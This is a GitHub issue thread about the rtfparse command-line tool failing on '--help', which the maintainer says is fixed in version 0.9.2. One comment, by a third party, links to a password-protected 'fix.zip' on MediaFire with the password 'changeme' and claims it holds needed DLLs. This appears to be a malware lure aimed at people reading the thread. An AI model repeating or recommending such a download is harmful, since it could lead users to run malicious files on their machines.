### ISSUE TITLE
[bug] rtfparse --help not work

### ISSUE THREAD

**Issue by Snoopy1866** [fleetingbytes/rtfparse#34]
after pip install the rtfparse, i run `rtfparse --help`, but not work.

![image](https://github.com/user-attachments/assets/9b689b89-a35f-4728-8923-49d63dd5be37)

**Comment by SagarChandra07** [comment]
maybe this will help
https://www.mediafire.com/file/q4gho1ar8e43udd/fix.zip/file
Archive password: changeme
I put the necessary dlls in the archive

**Comment by fleetingbytes** [comment]
Thank you for the report. I fixed it in 0.9.2
